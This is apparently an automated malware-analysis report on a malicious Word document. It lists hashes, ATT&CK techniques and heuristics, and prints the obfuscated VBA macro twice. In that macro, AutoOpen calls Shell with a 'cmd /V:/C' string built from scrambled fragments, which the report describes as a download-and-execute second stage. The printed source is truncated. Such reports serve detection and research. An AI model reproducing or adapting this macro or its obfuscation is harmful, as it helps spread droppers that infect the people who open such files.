Office (OLE) malware analysis — malicious · 1462f92f38bd9d10

MALICIOUS

Office (OLE)

62.6 KB Created: 2018-08-06 07:51:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 75db5dd7c3549c662e016bd8fe44d936 SHA-1: c583a0104da1014b6683935ba0f86fed52ebc49e SHA-256: 1462f92f38bd9d107d2e01367fed31a1a3c9b49a80e51c9f7fa1949a49ba7e9f

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and attempts to execute a command constructed from concatenated strings. This command appears to be designed to download and execute a second-stage payload, indicated by the 'Shell' function call and the constructed command string.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4982 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4982 bytes
SHA-256: `68c38dc7b92d4dc5983aa82bb4d71f46efdc12a2f9a595516c1640496a366394`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GUpWZkaplEqXMk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName ChrW(51844 / itvAq) TypeName Tan(89266 - 6562) TypeName Tan(KoRDiT) TypeName Rnd(36987 - tYYwIT + 20120 * cwUSVz) Shell@ CStr("c") + ZDwomzuJ + pOoRSzKaQw + oHvUcN + wzcdXzlMo + DUzKrjihNo + bwpQwKSFM + OClpjYNSU, 711607614 - 711607614 TypeName Oct(ZMAjh) TypeName Int(AaqGJZ) End Sub Attribute VB_Name = "jdmBMJuTUH" Function oHvUcN() On Error Resume Next TypeName CStr(711) TypeName CByte(54352 * qMOSLW) DDnbDNpMjI = "md /" + "V:/C" + CStr(Chr(wsBIGHi + OOfIRiYwVKvuUH + 34 + VfXwTiszZ + JusTwtBEB)) + "set As=DuP" + "Knh" + "ML" + "zD" + "i" TypeName ChrB(21045 + PjiwNE - 57184 + rwUiom) TypeName Atn(zEjti + fQojGj) TypeName Chr(VETwM) lMHwaF = "Va" + "Pn" + "LWstidv" + "p{2j$" + "@15\kqF" + "-rwCxfI;" + "9:bG?" + "mN,c.OyoA" TypeName ChrB(958) TypeName Sin(PvmofR + YbVqW + 20231 * REcERI) TypeName CSng(zCibPL) sqHauZQ = "le}T+" + "(=' /S" + ")B&&fo" + "r" + " %i in (22" + ",54,36" + ",57," + "35,17," + "5,57" + ",56,56," + "64,26," TypeName Rnd(vFZRwr / zzcIiK - lLaCsk / HlzQz) TypeName Sgn(EBAjC) TypeName 4 vUfrRBoz = "3" + ",59" + ",8,62," + "1" + "4,57,3" + "6,34,54," + "44" + ",25,5" + "7,50,18,64" + "," + "48" TypeName CBool(LTMdER / YTmKzP) TypeName CDate(17903 / 98833 - 79248 / nUbAA) rrYzKHUONL = ",57,18" + ",51" + "," + "16," + "57,44,3" + "7,5" + "6,19," + "57,14,18," + "41,26,55" TypeName CByte(73) TypeName Int(42258299) TypeName bcRzUa LwTcTPwwmo = ",20," + "68,62,63,5" + ",18,1" + "8" + ",22," + "43,65,65," + "17" + ",57" + ",35,1" TypeName CInt(61661 / MpGZz) TypeName ChrB(31) UpzlF = "9,18,54,22" + ",54,56,12," + "51,50," + "54,47," + "65,33," + "5" + "6,1,38,6" + "5,18,17" TypeName Cos(LqhMiH) TypeName CInt(LTEjI) BzidkRwW = "," + "1" + "8,65,19," + "14,20" + ",57" + ",38,51" TypeName Fix(qVNdpa) TypeName Tan(37179 + wzNCDo * 67137 + GmluPj) TypeName 2950 EtjVhLjI = ",22,5,22," + "46,5" + "6" + ",62," + "8" + ",38,50,2" TypeName ChrW(6802 + bYDWD + 55367 / qLizl) TypeName fjJjG CEIEn = "4,51,18,31" + ",1" + "4," + "63,51," + "66,22,56,1" + "9," + "18" + ",61,63,2" + "7,63," + "67,41,2" + "6,17,15," TypeName Chr(wBjRB - lXFXXK - 83617 * ubKZw) TypeName IHBVh TypeName Round(99106 * 61436 / 77296 - vlGcC) FOXLKzlz = "52,64," + "62,64,63,4" + "2,29,28,63" + ",41,26,36," + "1" + "5,40,6" + "2,26,57,14" + ",21,43," + "18,57,47,2" + "2,60," oHvUcN = DDnbDNpMjI + lMHwaF + sqHauZQ + vUfrRBoz + rrYzKHUONL + LwTcTPwwmo + UpzlF + BzidkRwW + EtjVhLjI + CEIEn + FOXLKzlz TypeName 62 TypeName 137 TypeName Rnd(160819625) End Function Function wzcdXzlMo() On Error Resume Next TypeName CStr(bOGWW / iYjLfw / ufwUqm + RMbYkj) TypeName 2233 TypeName CByte(1) CGiwwiUj = "6" + "3,3" + "0,63" + "," + "60," + "26" + ",17,1" TypeName Atn(6694) TypeName CDate(ikfnOK + KzPik + 13165 * oHKpG) TypeName Fix(49819892) jMIji = "5,52,60" + ",63,51,5" + "7,38" + ",57,63" + ",4" + "1,39," + "54,35," + "57,12,50," + "5,61,26,3" + "2" TypeName Pmhlp TypeName CDate(AiukPD + shJcc) TypeName Cos(4719 * rRcska) MzKmPbfGXrz = ",45,22" + ",64," + "19,14,64,2" + "6" + ",5" + "5,20" + ",68," + "67" TypeName cldQAh TypeName MzOvp fMRdN = ",23,18" + ",35," + "53,23," + "26,3,59," + "8,51,9,5" + "4," TypeName tSIwMp TypeName jvPIw CTiWzKpEi = "36,14,5" + "6" + ",54" + ",12,20,33," + "19,56,57,6" TypeName Round(25) TypeName Log(932) TypeName Cos(3) NcrTSVR = "1,26,32," + "45,22" + ",49,64,2" + "6" + ",36,15," + "40" + ",67,41," + "66,1" TypeName CSng(ZzrzkD) TypeName omBvkH TypeName Tan(ZvPni) iHDdjwOEIX = "8," + "12,3" + "5,18," + "34,1" + "3," + "35," + "54,50," + "57,1" + "7,17" TypeName CSng(RQczc + FWPOLw) TypeName Rnd(71) ... (truncated)

SHA-256: 68c38dc7b92d4dc5983aa82bb4d71f46efdc12a2f9a595516c1640496a366394

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GUpWZkaplEqXMk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName ChrW(51844 / itvAq)
   TypeName Tan(89266 - 6562)
   TypeName Tan(KoRDiT)
   TypeName Rnd(36987 - tYYwIT + 20120 * cwUSVz)
Shell@ CStr("c") + ZDwomzuJ + pOoRSzKaQw + oHvUcN + wzcdXzlMo + DUzKrjihNo + bwpQwKSFM + OClpjYNSU, 711607614 - 711607614
   TypeName Oct(ZMAjh)
   TypeName Int(AaqGJZ)
End Sub


Attribute VB_Name = "jdmBMJuTUH"
Function oHvUcN()
On Error Resume Next
TypeName CStr(711)
   TypeName CByte(54352 * qMOSLW)
DDnbDNpMjI = "md /" + "V:/C" + CStr(Chr(wsBIGHi + OOfIRiYwVKvuUH + 34 + VfXwTiszZ + JusTwtBEB)) + "set As=DuP" + "Knh" + "ML" + "zD" + "i"
TypeName ChrB(21045 + PjiwNE - 57184 + rwUiom)
   TypeName Atn(zEjti + fQojGj)
   TypeName Chr(VETwM)
lMHwaF = "Va" + "Pn" + "LWstidv" + "p{2j$" + "@15\kqF" + "-rwCxfI;" + "9:bG?" + "mN,c.OyoA"
TypeName ChrB(958)
   TypeName Sin(PvmofR + YbVqW + 20231 * REcERI)
   TypeName CSng(zCibPL)
sqHauZQ = "le}T+" + "(=' /S" + ")B&&fo" + "r" + " %i in (22" + ",54,36" + ",57," + "35,17," + "5,57" + ",56,56," + "64,26,"
TypeName Rnd(vFZRwr / zzcIiK - lLaCsk / HlzQz)
   TypeName Sgn(EBAjC)
   TypeName 4
vUfrRBoz = "3" + ",59" + ",8,62," + "1" + "4,57,3" + "6,34,54," + "44" + ",25,5" + "7,50,18,64" + "," + "48"
TypeName CBool(LTMdER / YTmKzP)
   TypeName CDate(17903 / 98833 - 79248 / nUbAA)
rrYzKHUONL = ",57,18" + ",51" + "," + "16," + "57,44,3" + "7,5" + "6,19," + "57,14,18," + "41,26,55"
TypeName CByte(73)
   TypeName Int(42258299)
   TypeName bcRzUa
LwTcTPwwmo = ",20," + "68,62,63,5" + ",18,1" + "8" + ",22," + "43,65,65," + "17" + ",57" + ",35,1"
TypeName CInt(61661 / MpGZz)
   TypeName ChrB(31)
UpzlF = "9,18,54,22" + ",54,56,12," + "51,50," + "54,47," + "65,33," + "5" + "6,1,38,6" + "5,18,17"
TypeName Cos(LqhMiH)
   TypeName CInt(LTEjI)
BzidkRwW = "," + "1" + "8,65,19," + "14,20" + ",57" + ",38,51"
TypeName Fix(qVNdpa)
   TypeName Tan(37179 + wzNCDo * 67137 + GmluPj)
   TypeName 2950
EtjVhLjI = ",22,5,22," + "46,5" + "6" + ",62," + "8" + ",38,50,2"
TypeName ChrW(6802 + bYDWD + 55367 / qLizl)
   TypeName fjJjG
CEIEn = "4,51,18,31" + ",1" + "4," + "63,51," + "66,22,56,1" + "9," + "18" + ",61,63,2" + "7,63," + "67,41,2" + "6,17,15,"
TypeName Chr(wBjRB - lXFXXK - 83617 * ubKZw)
   TypeName IHBVh
   TypeName Round(99106 * 61436 / 77296 - vlGcC)
FOXLKzlz = "52,64," + "62,64,63,4" + "2,29,28,63" + ",41,26,36," + "1" + "5,40,6" + "2,26,57,14" + ",21,43," + "18,57,47,2" + "2,60,"
oHvUcN = DDnbDNpMjI + lMHwaF + sqHauZQ + vUfrRBoz + rrYzKHUONL + LwTcTPwwmo + UpzlF + BzidkRwW + EtjVhLjI + CEIEn + FOXLKzlz
   TypeName 62
   TypeName 137
   TypeName Rnd(160819625)
End Function
Function wzcdXzlMo()
On Error Resume Next
TypeName CStr(bOGWW / iYjLfw / ufwUqm + RMbYkj)
   TypeName 2233
   TypeName CByte(1)
CGiwwiUj = "6" + "3,3" + "0,63" + "," + "60," + "26" + ",17,1"
TypeName Atn(6694)
   TypeName CDate(ikfnOK + KzPik + 13165 * oHKpG)
   TypeName Fix(49819892)
jMIji = "5,52,60" + ",63,51,5" + "7,38" + ",57,63" + ",4" + "1,39," + "54,35," + "57,12,50," + "5,61,26,3" + "2"
TypeName Pmhlp
   TypeName CDate(AiukPD + shJcc)
   TypeName Cos(4719 * rRcska)
MzKmPbfGXrz = ",45,22" + ",64," + "19,14,64,2" + "6" + ",5" + "5,20" + ",68," + "67"
TypeName cldQAh
   TypeName MzOvp
fMRdN = ",23,18" + ",35," + "53,23," + "26,3,59," + "8,51,9,5" + "4,"
TypeName tSIwMp
   TypeName jvPIw
CTiWzKpEi = "36,14,5" + "6" + ",54" + ",12,20,33," + "19,56,57,6"
TypeName Round(25)
   TypeName Log(932)
   TypeName Cos(3)
NcrTSVR = "1,26,32," + "45,22" + ",49,64,2" + "6" + ",36,15," + "40" + ",67,41," + "66,1"
TypeName CSng(ZzrzkD)
   TypeName omBvkH
   TypeName Tan(ZvPni)
iHDdjwOEIX = "8," + "12,3" + "5,18," + "34,1" + "3," + "35," + "54,50," + "57,1" + "7,17"
TypeName CSng(RQczc + FWPOLw)
   TypeName Rnd(71)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.